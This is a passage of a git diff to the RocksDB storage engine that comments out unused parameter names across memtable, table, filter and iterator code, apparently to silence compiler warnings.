The object is diff --git a/include/rocksdb/utilities/optimistic_transaction_db.h b/include/rocksdb/utilities/optimistic_transaction_db.h index 02917ff5830..518bc610c6d 100644 --- a/include/rocksdb/utilities/optimistic_transaction_db.h +++ b/include/rocksdb/utilities/optimistic_transaction_db.h @@ -62,7 +62,7 @@ class OptimisticTransactionDB { protected: // To Create an OptimisticTransactionDB, call Open() - explicit OptimisticTransactionDB(DB* db) {} + explicit OptimisticTransactionDB(DB* /*db*/) {} OptimisticTransactionDB() {} private: diff --git a/include/rocksdb/utilities/transaction.h b/include/rocksdb/utilities/transaction.h index 8507ef133fb..a461c9e856a 100644 --- a/include/rocksdb/utilities/transaction.h +++ b/include/rocksdb/utilities/transaction.h @@ -402,8 +402,8 @@ class Transaction { virtual bool IsDeadlockDetect() const { return false; } - virtual std::vector GetWaitingTxns(uint32_t* column_family_id, - std::string* key) const { + virtual std::vector GetWaitingTxns( + uint32_t* /*column_family_id*/, std::string* /*key*/) const { assert(false); return std::vector(); } @@ -423,7 +423,7 @@ class Transaction { void SetState(TransactionState state) { txn_state_ = state; } protected: - explicit Transaction(const TransactionDB* db) {} + explicit Transaction(const TransactionDB* /*db*/) {} Transaction() {} // the log in which the prepared section for this txn resides diff --git a/include/rocksdb/wal_filter.h b/include/rocksdb/wal_filter.h index 686fa499893..a22dca92377 100644 --- a/include/rocksdb/wal_filter.h +++ b/include/rocksdb/wal_filter.h @@ -44,8 +44,8 @@ class WalFilter { // @params cf_name_id_map column_family_name to column_family_id map virtual void ColumnFamilyLogNumberMap( - const std::map& cf_lognumber_map, - const std::map& cf_name_id_map) {} + const std::map& /*cf_lognumber_map*/, + const std::map& /*cf_name_id_map*/) {} // LogRecord is invoked for each log record encountered for all the logs // during replay on logs on recovery. This method can be used to: @@ -75,11 +75,9 @@ class WalFilter { // @returns Processing option for the current record. // Please see WalProcessingOption enum above for // details. - virtual WalProcessingOption LogRecordFound(unsigned long long log_number, - const std::string& log_file_name, - const WriteBatch& batch, - WriteBatch* new_batch, - bool* batch_changed) { + virtual WalProcessingOption LogRecordFound( + unsigned long long /*log_number*/, const std::string& /*log_file_name*/, + const WriteBatch& batch, WriteBatch* new_batch, bool* batch_changed) { // Default implementation falls back to older function for compatibility return LogRecord(batch, new_batch, batch_changed); } @@ -87,9 +85,9 @@ class WalFilter { // Please see the comments for LogRecord above. This function is for // compatibility only and contains a subset of parameters. // New code should use the function above. 
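// Illustrative aside, not part of the patch: a WalFilter names only the
// parameters it inspects; the rest stay commented out as in the hunk above.
// A hypothetical filter that skips records from WALs older than a chosen
// log number (installed through DBOptions::wal_filter):
#include <string>
#include "rocksdb/wal_filter.h"

class SkipOldLogsFilter : public rocksdb::WalFilter {
 public:
  explicit SkipOldLogsFilter(unsigned long long min_log)
      : min_log_(min_log) {}
  WalProcessingOption LogRecordFound(
      unsigned long long log_number, const std::string& /*log_file_name*/,
      const rocksdb::WriteBatch& /*batch*/,
      rocksdb::WriteBatch* /*new_batch*/,
      bool* /*batch_changed*/) override {
    return log_number < min_log_
               ? WalProcessingOption::kIgnoreCurrentRecord
               : WalProcessingOption::kContinueProcessing;
  }
  const char* Name() const override { return "SkipOldLogsFilter"; }
 private:
  unsigned long long min_log_;
};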
- virtual WalProcessingOption LogRecord(const WriteBatch& batch, - WriteBatch* new_batch, - bool* batch_changed) const { + virtual WalProcessingOption LogRecord(const WriteBatch& /*batch*/, + WriteBatch* /*new_batch*/, + bool* /*batch_changed*/) const { return WalProcessingOption::kContinueProcessing; } diff --git a/include/rocksdb/write_batch.h b/include/rocksdb/write_batch.h index 8bd93d36c4e..d708933f842 100644 --- a/include/rocksdb/write_batch.h +++ b/include/rocksdb/write_batch.h @@ -217,8 +217,9 @@ class WriteBatch : public WriteBatchBase { } virtual void SingleDelete(const Slice& /*key*/) {} - virtual Status DeleteRangeCF(uint32_t column_family_id, - const Slice& begin_key, const Slice& end_key) { + virtual Status DeleteRangeCF(uint32_t /*column_family_id*/, + const Slice& /*begin_key*/, + const Slice& /*end_key*/) { return Status::InvalidArgument("DeleteRangeCF not implemented"); } @@ -240,16 +241,16 @@ class WriteBatch : public WriteBatchBase { return Status::InvalidArgument("MarkBeginPrepare() handler not defined."); } - virtual Status MarkEndPrepare(const Slice& xid) { + virtual Status MarkEndPrepare(const Slice& /*xid*/) { return Status::InvalidArgument("MarkEndPrepare() handler not defined."); } - virtual Status MarkRollback(const Slice& xid) { + virtual Status MarkRollback(const Slice& /*xid*/) { return Status::InvalidArgument( "MarkRollbackPrepare() handler not defined."); } - virtual Status MarkCommit(const Slice& xid) { + virtual Status MarkCommit(const Slice& /*xid*/) { return Status::InvalidArgument("MarkCommit() handler not defined."); } diff --git a/memtable/hash_cuckoo_rep.cc b/memtable/hash_cuckoo_rep.cc index 034bf5858b6..39078633f67 100644 --- a/memtable/hash_cuckoo_rep.cc +++ b/memtable/hash_cuckoo_rep.cc @@ -597,8 +597,8 @@ void HashCuckooRep::Iterator::Seek(const Slice& user_key, } // Retreat to the last entry with a key <= target -void HashCuckooRep::Iterator::SeekForPrev(const Slice& user_key, - const char* memtable_key) { +void HashCuckooRep::Iterator::SeekForPrev(const Slice& /*user_key*/, + const char* /*memtable_key*/) { assert(false); } @@ -623,7 +623,7 @@ void HashCuckooRep::Iterator::SeekToLast() { MemTableRep* HashCuckooRepFactory::CreateMemTableRep( const MemTableRep::KeyComparator& compare, Allocator* allocator, - const SliceTransform* transform, Logger* logger) { + const SliceTransform* /*transform*/, Logger* /*logger*/) { // The estimated average fullness. The write performance of any close hash // degrades as the fullness of the mem-table increases. 
Setting kFullness // to a value around 0.7 can better avoid write performance degradation while diff --git a/memtable/hash_linklist_rep.cc b/memtable/hash_linklist_rep.cc index 932b62a3460..b23a9f5e51d 100644 --- a/memtable/hash_linklist_rep.cc +++ b/memtable/hash_linklist_rep.cc @@ -362,14 +362,14 @@ class HashLinkListRep : public MemTableRep { // Advance to the first entry with a key >= target virtual void Seek(const Slice& internal_key, - const char* memtable_key) override { + const char* /*memtable_key*/) override { node_ = hash_link_list_rep_->FindGreaterOrEqualInBucket(head_, internal_key); } // Retreat to the last entry with a key <= target - virtual void SeekForPrev(const Slice& internal_key, - const char* memtable_key) override { + virtual void SeekForPrev(const Slice& /*internal_key*/, + const char* /*memtable_key*/) override { // Since we do not support Prev() // We simply do not support SeekForPrev Reset(nullptr); @@ -483,10 +483,10 @@ class HashLinkListRep : public MemTableRep { } virtual void Next() override {} virtual void Prev() override {} - virtual void Seek(const Slice& user_key, - const char* memtable_key) override {} - virtual void SeekForPrev(const Slice& user_key, - const char* memtable_key) override {} + virtual void Seek(const Slice& /*user_key*/, + const char* /*memtable_key*/) override {} + virtual void SeekForPrev(const Slice& /*user_key*/, + const char* /*memtable_key*/) override {} virtual void SeekToFirst() override {} virtual void SeekToLast() override {} diff --git a/memtable/hash_skiplist_rep.cc b/memtable/hash_skiplist_rep.cc index e34743eb2c7..93082b1ec28 100644 --- a/memtable/hash_skiplist_rep.cc +++ b/memtable/hash_skiplist_rep.cc @@ -131,8 +131,8 @@ class HashSkipListRep : public MemTableRep { } // Retreat to the last entry with a key <= target - virtual void SeekForPrev(const Slice& internal_key, - const char* memtable_key) override { + virtual void SeekForPrev(const Slice& /*internal_key*/, + const char* /*memtable_key*/) override { // not supported assert(false); } @@ -219,10 +219,10 @@ class HashSkipListRep : public MemTableRep { } virtual void Next() override {} virtual void Prev() override {} - virtual void Seek(const Slice& internal_key, - const char* memtable_key) override {} - virtual void SeekForPrev(const Slice& internal_key, - const char* memtable_key) override {} + virtual void Seek(const Slice& /*internal_key*/, + const char* /*memtable_key*/) override {} + virtual void SeekForPrev(const Slice& /*internal_key*/, + const char* /*memtable_key*/) override {} virtual void SeekToFirst() override {} virtual void SeekToLast() override {} @@ -335,7 +335,7 @@ MemTableRep::Iterator* HashSkipListRep::GetDynamicPrefixIterator(Arena* arena) { MemTableRep* HashSkipListRepFactory::CreateMemTableRep( const MemTableRep::KeyComparator& compare, Allocator* allocator, - const SliceTransform* transform, Logger* logger) { + const SliceTransform* transform, Logger* /*logger*/) { return new HashSkipListRep(compare, allocator, transform, bucket_count_, skiplist_height_, skiplist_branching_factor_); } diff --git a/memtable/skiplistrep.cc b/memtable/skiplistrep.cc index f56be5dcb62..235d33b818d 100644 --- a/memtable/skiplistrep.cc +++ b/memtable/skiplistrep.cc @@ -270,7 +270,7 @@ class SkipListRep : public MemTableRep { MemTableRep* SkipListFactory::CreateMemTableRep( const MemTableRep::KeyComparator& compare, Allocator* allocator, - const SliceTransform* transform, Logger* logger) { + const SliceTransform* transform, Logger* /*logger*/) { return new 
SkipListRep(compare, allocator, transform, lookahead_); } diff --git a/memtable/vectorrep.cc b/memtable/vectorrep.cc index e54025c2d3d..378b29624af 100644 --- a/memtable/vectorrep.cc +++ b/memtable/vectorrep.cc @@ -227,8 +227,8 @@ void VectorRep::Iterator::Seek(const Slice& user_key, } // Advance to the first entry with a key <= target -void VectorRep::Iterator::SeekForPrev(const Slice& user_key, - const char* memtable_key) { +void VectorRep::Iterator::SeekForPrev(const Slice& /*user_key*/, + const char* /*memtable_key*/) { assert(false); } @@ -296,7 +296,7 @@ MemTableRep::Iterator* VectorRep::GetIterator(Arena* arena) { MemTableRep* VectorRepFactory::CreateMemTableRep( const MemTableRep::KeyComparator& compare, Allocator* allocator, - const SliceTransform*, Logger* logger) { + const SliceTransform*, Logger* /*logger*/) { return new VectorRep(compare, allocator, count_); } } // namespace rocksdb diff --git a/options/options_helper.cc b/options/options_helper.cc index 9e984f6e39e..82c734cba99 100644 --- a/options/options_helper.cc +++ b/options/options_helper.cc @@ -1129,7 +1129,7 @@ Status GetPlainTableOptionsFromMap( const PlainTableOptions& table_options, const std::unordered_map& opts_map, PlainTableOptions* new_table_options, bool input_strings_escaped, - bool ignore_unknown_options) { + bool /*ignore_unknown_options*/) { assert(new_table_options); *new_table_options = table_options; for (const auto& o : opts_map) { diff --git a/options/options_parser.cc b/options/options_parser.cc index d5a3fec6ef0..fc4e119f3db 100644 --- a/options/options_parser.cc +++ b/options/options_parser.cc @@ -689,7 +689,7 @@ Status RocksDBOptionsParser::VerifyRocksDBOptionsFromFile( Status RocksDBOptionsParser::VerifyDBOptions( const DBOptions& base_opt, const DBOptions& persisted_opt, - const std::unordered_map* opt_map, + const std::unordered_map* /*opt_map*/, OptionsSanityCheckLevel sanity_check_level) { for (auto pair : db_options_type_info) { if (pair.second.verification == OptionVerificationType::kDeprecated) { diff --git a/port/port_posix.cc b/port/port_posix.cc index 59241daff44..e3af7726024 100644 --- a/port/port_posix.cc +++ b/port/port_posix.cc @@ -35,7 +35,7 @@ static int PthreadCall(const char* label, int result) { return result; } -Mutex::Mutex(bool adaptive) { +Mutex::Mutex(bool /*adaptive*/) { #ifdef ROCKSDB_PTHREAD_ADAPTIVE_MUTEX if (!adaptive) { PthreadCall("init mutex", pthread_mutex_init(&mu_, nullptr)); diff --git a/port/stack_trace.cc b/port/stack_trace.cc index baaf140142d..6f657be51b2 100644 --- a/port/stack_trace.cc +++ b/port/stack_trace.cc @@ -13,7 +13,7 @@ namespace rocksdb { namespace port { void InstallStackTraceHandler() {} -void PrintStack(int first_frames_to_skip) {} +void PrintStack(int /*first_frames_to_skip*/) {} } // namespace port } // namespace rocksdb diff --git a/table/adaptive_table_factory.cc b/table/adaptive_table_factory.cc index f83905dff3a..173bca71c1b 100644 --- a/table/adaptive_table_factory.cc +++ b/table/adaptive_table_factory.cc @@ -44,7 +44,7 @@ Status AdaptiveTableFactory::NewTableReader( const TableReaderOptions& table_reader_options, unique_ptr&& file, uint64_t file_size, unique_ptr* table, - bool prefetch_index_and_filter_in_cache) const { + bool /*prefetch_index_and_filter_in_cache*/) const { Footer footer; auto s = ReadFooterFromFile(file.get(), file_size, &footer); if (!s.ok()) { diff --git a/table/adaptive_table_factory.h b/table/adaptive_table_factory.h index b7b52ba96fc..00af6a76e95 100644 --- a/table/adaptive_table_factory.h +++ 
b/table/adaptive_table_factory.h @@ -44,8 +44,9 @@ class AdaptiveTableFactory : public TableFactory { uint32_t column_family_id, WritableFileWriter* file) const override; // Sanitizes the specified DB Options. - Status SanitizeOptions(const DBOptions& db_opts, - const ColumnFamilyOptions& cf_opts) const override { + Status SanitizeOptions( + const DBOptions& /*db_opts*/, + const ColumnFamilyOptions& /*cf_opts*/) const override { return Status::OK(); } diff --git a/table/block_based_filter_block.cc b/table/block_based_filter_block.cc index 697c11a42f0..a09f1a0e0af 100644 --- a/table/block_based_filter_block.cc +++ b/table/block_based_filter_block.cc @@ -113,7 +113,7 @@ inline void BlockBasedFilterBlockBuilder::AddPrefix(const Slice& key) { } } -Slice BlockBasedFilterBlockBuilder::Finish(const BlockHandle& tmp, +Slice BlockBasedFilterBlockBuilder::Finish(const BlockHandle& /*tmp*/, Status* status) { // In this impl we ignore BlockHandle *status = Status::OK(); @@ -185,8 +185,8 @@ BlockBasedFilterBlockReader::BlockBasedFilterBlockReader( } bool BlockBasedFilterBlockReader::KeyMayMatch( - const Slice& key, uint64_t block_offset, const bool no_io, - const Slice* const const_ikey_ptr) { + const Slice& key, uint64_t block_offset, const bool /*no_io*/, + const Slice* const /*const_ikey_ptr*/) { assert(block_offset != kNotValid); if (!whole_key_filtering_) { return true; @@ -195,8 +195,8 @@ bool BlockBasedFilterBlockReader::KeyMayMatch( } bool BlockBasedFilterBlockReader::PrefixMayMatch( - const Slice& prefix, uint64_t block_offset, const bool no_io, - const Slice* const const_ikey_ptr) { + const Slice& prefix, uint64_t block_offset, const bool /*no_io*/, + const Slice* const /*const_ikey_ptr*/) { assert(block_offset != kNotValid); if (!prefix_extractor_) { return true; diff --git a/table/block_based_table_builder.cc b/table/block_based_table_builder.cc index e87def73e7e..594fd92fce1 100644 --- a/table/block_based_table_builder.cc +++ b/table/block_based_table_builder.cc @@ -209,8 +209,8 @@ class BlockBasedTableBuilder::BlockBasedTablePropertiesCollector whole_key_filtering_(whole_key_filtering), prefix_filtering_(prefix_filtering) {} - virtual Status InternalAdd(const Slice& key, const Slice& value, - uint64_t file_size) override { + virtual Status InternalAdd(const Slice& /*key*/, const Slice& /*value*/, + uint64_t /*file_size*/) override { // Intentionally left blank. Have no interest in collecting stats for // individual key/value pairs. 
return Status::OK(); @@ -585,7 +585,7 @@ Status BlockBasedTableBuilder::status() const { return rep_->status; } -static void DeleteCachedBlock(const Slice& key, void* value) { +static void DeleteCachedBlock(const Slice& /*key*/, void* value) { Block* block = reinterpret_cast(value); delete block; } diff --git a/table/block_based_table_factory.cc b/table/block_based_table_factory.cc index 4705046bfeb..3620db1416e 100644 --- a/table/block_based_table_factory.cc +++ b/table/block_based_table_factory.cc @@ -82,8 +82,7 @@ TableBuilder* BlockBasedTableFactory::NewTableBuilder( } Status BlockBasedTableFactory::SanitizeOptions( - const DBOptions& db_opts, - const ColumnFamilyOptions& cf_opts) const { + const DBOptions& /*db_opts*/, const ColumnFamilyOptions& cf_opts) const { if (table_options_.index_type == BlockBasedTableOptions::kHashSearch && cf_opts.prefix_extractor == nullptr) { return Status::InvalidArgument("Hash index is specified for block-based " diff --git a/table/block_based_table_reader.cc b/table/block_based_table_reader.cc index 123e1814ab7..5ac1300789c 100644 --- a/table/block_based_table_reader.cc +++ b/table/block_based_table_reader.cc @@ -91,13 +91,13 @@ Status ReadBlockFromFile(RandomAccessFileReader* file, const Footer& footer, // Delete the resource that is held by the iterator. template -void DeleteHeldResource(void* arg, void* ignored) { +void DeleteHeldResource(void* arg, void* /*ignored*/) { delete reinterpret_cast(arg); } // Delete the entry resided in the cache. template -void DeleteCachedEntry(const Slice& key, void* value) { +void DeleteCachedEntry(const Slice& /*key*/, void* value) { auto entry = reinterpret_cast(value); delete entry; } @@ -179,8 +179,8 @@ class PartitionIndexReader : public IndexReader, public Cleanable { } // return a two-level iterator: first level is on the partition index - virtual InternalIterator* NewIterator(BlockIter* iter = nullptr, - bool dont_care = true) override { + virtual InternalIterator* NewIterator(BlockIter* /*iter*/ = nullptr, + bool /*dont_care*/ = true) override { // Filters are already checked before seeking the index const bool skip_filters = true; const bool is_index = true; @@ -259,7 +259,7 @@ class BinarySearchIndexReader : public IndexReader { } virtual InternalIterator* NewIterator(BlockIter* iter = nullptr, - bool dont_care = true) override { + bool /*dont_care*/ = true) override { return index_block_->NewIterator(icomparator_, iter, true); } @@ -294,7 +294,7 @@ class HashIndexReader : public IndexReader { const BlockHandle& index_handle, InternalIterator* meta_index_iter, IndexReader** index_reader, - bool hash_index_allow_collision, + bool /*hash_index_allow_collision*/, const PersistentCacheOptions& cache_options) { std::unique_ptr index_block; auto s = ReadBlockFromFile( @@ -941,7 +941,7 @@ Status BlockBasedTable::GetDataBlockFromCache( Status BlockBasedTable::PutDataBlockToCache( const Slice& block_cache_key, const Slice& compressed_block_cache_key, Cache* block_cache, Cache* block_cache_compressed, - const ReadOptions& read_options, const ImmutableCFOptions& ioptions, + const ReadOptions& /*read_options*/, const ImmutableCFOptions& ioptions, CachableEntry* block, Block* raw_block, uint32_t format_version, const Slice& compression_dict, size_t read_amp_bytes_per_bit, bool is_index, Cache::Priority priority) { @@ -2257,7 +2257,7 @@ void BlockBasedTable::DumpKeyValue(const Slice& key, const Slice& value, namespace { -void DeleteCachedFilterEntry(const Slice& key, void* value) { +void DeleteCachedFilterEntry(const 
Slice& /*key*/, void* value) { FilterBlockReader* filter = reinterpret_cast(value); if (filter->statistics() != nullptr) { RecordTick(filter->statistics(), BLOCK_CACHE_FILTER_BYTES_EVICT, @@ -2266,7 +2266,7 @@ void DeleteCachedFilterEntry(const Slice& key, void* value) { delete filter; } -void DeleteCachedIndexEntry(const Slice& key, void* value) { +void DeleteCachedIndexEntry(const Slice& /*key*/, void* value) { IndexReader* index_reader = reinterpret_cast(value); if (index_reader->statistics() != nullptr) { RecordTick(index_reader->statistics(), BLOCK_CACHE_INDEX_BYTES_EVICT, diff --git a/table/block_test.cc b/table/block_test.cc index f5c543975f4..0258be4866c 100644 --- a/table/block_test.cc +++ b/table/block_test.cc @@ -133,7 +133,7 @@ TEST_F(BlockTest, SimpleTest) { BlockContents GetBlockContents(std::unique_ptr *builder, const std::vector &keys, const std::vector &values, - const int prefix_group_size = 1) { + const int /*prefix_group_size*/ = 1) { builder->reset(new BlockBuilder(1 /* restart interval */)); // Add only half of the keys diff --git a/table/cuckoo_table_builder_test.cc b/table/cuckoo_table_builder_test.cc index ec282b4b540..dfd80c22a5a 100644 --- a/table/cuckoo_table_builder_test.cc +++ b/table/cuckoo_table_builder_test.cc @@ -23,7 +23,7 @@ namespace { std::unordered_map> hash_map; uint64_t GetSliceHash(const Slice& s, uint32_t index, - uint64_t max_num_buckets) { + uint64_t /*max_num_buckets*/) { return hash_map[s.ToString()][index]; } } // namespace diff --git a/table/cuckoo_table_factory.cc b/table/cuckoo_table_factory.cc index 2325bcf77c4..84d22468eb9 100644 --- a/table/cuckoo_table_factory.cc +++ b/table/cuckoo_table_factory.cc @@ -16,7 +16,7 @@ Status CuckooTableFactory::NewTableReader( const TableReaderOptions& table_reader_options, unique_ptr&& file, uint64_t file_size, std::unique_ptr* table, - bool prefetch_index_and_filter_in_cache) const { + bool /*prefetch_index_and_filter_in_cache*/) const { std::unique_ptr new_reader(new CuckooTableReader( table_reader_options.ioptions, std::move(file), file_size, table_reader_options.internal_comparator.user_comparator(), nullptr)); diff --git a/table/cuckoo_table_factory.h b/table/cuckoo_table_factory.h index 774dc3c3e80..e3371563fb5 100644 --- a/table/cuckoo_table_factory.h +++ b/table/cuckoo_table_factory.h @@ -67,8 +67,9 @@ class CuckooTableFactory : public TableFactory { uint32_t column_family_id, WritableFileWriter* file) const override; // Sanitizes the specified DB Options. - Status SanitizeOptions(const DBOptions& db_opts, - const ColumnFamilyOptions& cf_opts) const override { + Status SanitizeOptions( + const DBOptions& /*db_opts*/, + const ColumnFamilyOptions& /*cf_opts*/) const override { return Status::OK(); } diff --git a/table/cuckoo_table_reader.cc b/table/cuckoo_table_reader.cc index 85670ad1daf..47d58753c0a 100644 --- a/table/cuckoo_table_reader.cc +++ b/table/cuckoo_table_reader.cc @@ -127,8 +127,9 @@ CuckooTableReader::CuckooTableReader( status_ = file_->Read(0, file_size, &file_data_, nullptr); } -Status CuckooTableReader::Get(const ReadOptions& readOptions, const Slice& key, - GetContext* get_context, bool skip_filters) { +Status CuckooTableReader::Get(const ReadOptions& /*readOptions*/, + const Slice& key, GetContext* get_context, + bool /*skip_filters*/) { assert(key.size() == key_length_ + (is_last_level_ ? 
8 : 0)); Slice user_key = ExtractUserKey(key); for (uint32_t hash_cnt = 0; hash_cnt < num_hash_func_; ++hash_cnt) { @@ -299,7 +300,7 @@ void CuckooTableIterator::Seek(const Slice& target) { PrepareKVAtCurrIdx(); } -void CuckooTableIterator::SeekForPrev(const Slice& target) { +void CuckooTableIterator::SeekForPrev(const Slice& /*target*/) { // Not supported assert(false); } @@ -364,8 +365,8 @@ extern InternalIterator* NewErrorInternalIterator(const Status& status, Arena* arena); InternalIterator* CuckooTableReader::NewIterator( - const ReadOptions& read_options, Arena* arena, - const InternalKeyComparator* icomp, bool skip_filters) { + const ReadOptions& /*read_options*/, Arena* arena, + const InternalKeyComparator* /*icomp*/, bool /*skip_filters*/) { if (!status().ok()) { return NewErrorInternalIterator( Status::Corruption("CuckooTableReader status is not okay."), arena); diff --git a/table/cuckoo_table_reader.h b/table/cuckoo_table_reader.h index f2b6d1a9cfe..fdb18beb939 100644 --- a/table/cuckoo_table_reader.h +++ b/table/cuckoo_table_reader.h @@ -55,7 +55,7 @@ class CuckooTableReader: public TableReader { size_t ApproximateMemoryUsage() const override; // Following methods are not implemented for Cuckoo Table Reader - uint64_t ApproximateOffsetOf(const Slice& key) override { return 0; } + uint64_t ApproximateOffsetOf(const Slice& /*key*/) override { return 0; } void SetupForCompaction() override {} // End of methods not implemented. diff --git a/table/cuckoo_table_reader_test.cc b/table/cuckoo_table_reader_test.cc index 7e131e56e31..a012bceeb7a 100644 --- a/table/cuckoo_table_reader_test.cc +++ b/table/cuckoo_table_reader_test.cc @@ -61,7 +61,7 @@ void AddHashLookups(const std::string& s, uint64_t bucket_id, } uint64_t GetSliceHash(const Slice& s, uint32_t index, - uint64_t max_num_buckets) { + uint64_t /*max_num_buckets*/) { return hash_map[s.ToString()][index]; } } // namespace diff --git a/table/full_filter_block.cc b/table/full_filter_block.cc index 5739494e8dd..448b827847b 100644 --- a/table/full_filter_block.cc +++ b/table/full_filter_block.cc @@ -43,7 +43,8 @@ inline void FullFilterBlockBuilder::AddPrefix(const Slice& key) { AddKey(prefix); } -Slice FullFilterBlockBuilder::Finish(const BlockHandle& tmp, Status* status) { +Slice FullFilterBlockBuilder::Finish(const BlockHandle& /*tmp*/, + Status* status) { // In this impl we ignore BlockHandle *status = Status::OK(); if (num_added_ != 0) { @@ -74,8 +75,8 @@ FullFilterBlockReader::FullFilterBlockReader( } bool FullFilterBlockReader::KeyMayMatch(const Slice& key, uint64_t block_offset, - const bool no_io, - const Slice* const const_ikey_ptr) { + const bool /*no_io*/, + const Slice* const /*const_ikey_ptr*/) { assert(block_offset == kNotValid); if (!whole_key_filtering_) { return true; @@ -83,10 +84,9 @@ bool FullFilterBlockReader::KeyMayMatch(const Slice& key, uint64_t block_offset, return MayMatch(key); } -bool FullFilterBlockReader::PrefixMayMatch(const Slice& prefix, - uint64_t block_offset, - const bool no_io, - const Slice* const const_ikey_ptr) { +bool FullFilterBlockReader::PrefixMayMatch( + const Slice& prefix, uint64_t block_offset, const bool /*no_io*/, + const Slice* const /*const_ikey_ptr*/) { assert(block_offset == kNotValid); if (!prefix_extractor_) { return true; diff --git a/table/full_filter_block.h b/table/full_filter_block.h index be27c58b61d..e161d079e54 100644 --- a/table/full_filter_block.h +++ b/table/full_filter_block.h @@ -43,7 +43,7 @@ class FullFilterBlockBuilder : public FilterBlockBuilder { 
~FullFilterBlockBuilder() {} virtual bool IsBlockBased() override { return false; } - virtual void StartBlock(uint64_t block_offset) override {} + virtual void StartBlock(uint64_t /*block_offset*/) override {} virtual void Add(const Slice& key) override; virtual Slice Finish(const BlockHandle& tmp, Status* status) override; using FilterBlockBuilder::Finish; diff --git a/table/get_context.cc b/table/get_context.cc index 0d688fe4609..aacf5d5bdf4 100644 --- a/table/get_context.cc +++ b/table/get_context.cc @@ -73,7 +73,7 @@ void GetContext::MarkKeyMayExist() { } } -void GetContext::SaveValue(const Slice& value, SequenceNumber seq) { +void GetContext::SaveValue(const Slice& value, SequenceNumber /*seq*/) { assert(state_ == kNotFound); appendToReplayLog(replay_log_, kTypeValue, value); diff --git a/table/index_builder.h b/table/index_builder.h index d591e0e533c..3793cebc258 100644 --- a/table/index_builder.h +++ b/table/index_builder.h @@ -69,7 +69,7 @@ class IndexBuilder { // This method will be called whenever a key is added. The subclasses may // override OnKeyAdded() if they need to collect additional information. - virtual void OnKeyAdded(const Slice& key) {} + virtual void OnKeyAdded(const Slice& /*key*/) {} // Inform the index builder that all entries has been written. Block builder // may therefore perform any operation required for block finalization. @@ -137,7 +137,7 @@ class ShortenedIndexBuilder : public IndexBuilder { using IndexBuilder::Finish; virtual Status Finish( IndexBlocks* index_blocks, - const BlockHandle& last_partition_block_handle) override { + const BlockHandle& /*last_partition_block_handle*/) override { index_blocks->index_block_contents = index_block_builder_.Finish(); return Status::OK(); } diff --git a/table/internal_iterator.h b/table/internal_iterator.h index 2bfdb7d952a..3dc8f926580 100644 --- a/table/internal_iterator.h +++ b/table/internal_iterator.h @@ -74,7 +74,8 @@ class InternalIterator : public Cleanable { // but for Iterators that need to communicate with PinnedIteratorsManager // they will implement this function and use the passed pointer to communicate // with PinnedIteratorsManager. - virtual void SetPinnedItersMgr(PinnedIteratorsManager* pinned_iters_mgr) {} + virtual void SetPinnedItersMgr(PinnedIteratorsManager* /*pinned_iters_mgr*/) { + } // If true, this means that the Slice returned by key() is valid as long as // PinnedIteratorsManager::ReleasePinnedData is not called and the @@ -91,7 +92,7 @@ class InternalIterator : public Cleanable { // Iterator is not deleted. 
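// Illustrative aside, not part of the patch: several iterators in this
// patch stub out SeekForPrev() (assert(false) or NotSupported). Where the
// underlying iterator supports Prev(), the classic emulation is Seek()
// followed by at most one step back; a sketch for the public Iterator API:
#include "rocksdb/comparator.h"
#include "rocksdb/iterator.h"

void SeekForPrevCompat(rocksdb::Iterator* it, const rocksdb::Slice& target,
                       const rocksdb::Comparator* cmp) {
  it->Seek(target);  // lands on the first key >= target
  if (!it->Valid()) {
    it->SeekToLast();  // every key is < target
  } else if (cmp->Compare(it->key(), target) > 0) {
    it->Prev();  // step back to the last key <= target
  }
}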
virtual bool IsValuePinned() const { return false; } - virtual Status GetProperty(std::string prop_name, std::string* prop) { + virtual Status GetProperty(std::string /*prop_name*/, std::string* /*prop*/) { return Status::NotSupported(""); } diff --git a/table/iterator.cc b/table/iterator.cc index 23a84b59e0f..295bf8b9cfe 100644 --- a/table/iterator.cc +++ b/table/iterator.cc @@ -98,8 +98,8 @@ class EmptyIterator : public Iterator { public: explicit EmptyIterator(const Status& s) : status_(s) { } virtual bool Valid() const override { return false; } - virtual void Seek(const Slice& target) override {} - virtual void SeekForPrev(const Slice& target) override {} + virtual void Seek(const Slice& /*target*/) override {} + virtual void SeekForPrev(const Slice& /*target*/) override {} virtual void SeekToFirst() override {} virtual void SeekToLast() override {} virtual void Next() override { assert(false); } @@ -122,8 +122,8 @@ class EmptyInternalIterator : public InternalIterator { public: explicit EmptyInternalIterator(const Status& s) : status_(s) {} virtual bool Valid() const override { return false; } - virtual void Seek(const Slice& target) override {} - virtual void SeekForPrev(const Slice& target) override {} + virtual void Seek(const Slice& /*target*/) override {} + virtual void SeekForPrev(const Slice& /*target*/) override {} virtual void SeekToFirst() override {} virtual void SeekToLast() override {} virtual void Next() override { assert(false); } diff --git a/table/mock_table.cc b/table/mock_table.cc index 4c9907e4599..4e8511031c4 100644 --- a/table/mock_table.cc +++ b/table/mock_table.cc @@ -27,14 +27,14 @@ stl_wrappers::KVMap MakeMockFile( } InternalIterator* MockTableReader::NewIterator(const ReadOptions&, - Arena* arena, + Arena* /*arena*/, const InternalKeyComparator*, - bool skip_filters) { + bool /*skip_filters*/) { return new MockTableIterator(table_); } Status MockTableReader::Get(const ReadOptions&, const Slice& key, - GetContext* get_context, bool skip_filters) { + GetContext* get_context, bool /*skip_filters*/) { std::unique_ptr iter(new MockTableIterator(table_)); for (iter->Seek(key); iter->Valid(); iter->Next()) { ParsedInternalKey parsed_key; @@ -57,10 +57,10 @@ std::shared_ptr MockTableReader::GetTableProperties() MockTableFactory::MockTableFactory() : next_id_(1) {} Status MockTableFactory::NewTableReader( - const TableReaderOptions& table_reader_options, - unique_ptr&& file, uint64_t file_size, + const TableReaderOptions& /*table_reader_options*/, + unique_ptr&& file, uint64_t /*file_size*/, unique_ptr* table_reader, - bool prefetch_index_and_filter_in_cache) const { + bool /*prefetch_index_and_filter_in_cache*/) const { uint32_t id = GetIDFromFile(file.get()); MutexLock lock_guard(&file_system_.mutex); @@ -76,8 +76,8 @@ Status MockTableFactory::NewTableReader( } TableBuilder* MockTableFactory::NewTableBuilder( - const TableBuilderOptions& table_builder_options, uint32_t column_family_id, - WritableFileWriter* file) const { + const TableBuilderOptions& /*table_builder_options*/, + uint32_t /*column_family_id*/, WritableFileWriter* file) const { uint32_t id = GetAndWriteNextID(file); return new MockTableBuilder(id, &file_system_); diff --git a/table/mock_table.h b/table/mock_table.h index 9e5396341c5..eca85d1b26c 100644 --- a/table/mock_table.h +++ b/table/mock_table.h @@ -46,7 +46,7 @@ class MockTableReader : public TableReader { Status Get(const ReadOptions&, const Slice& key, GetContext* get_context, bool skip_filters = false) override; - 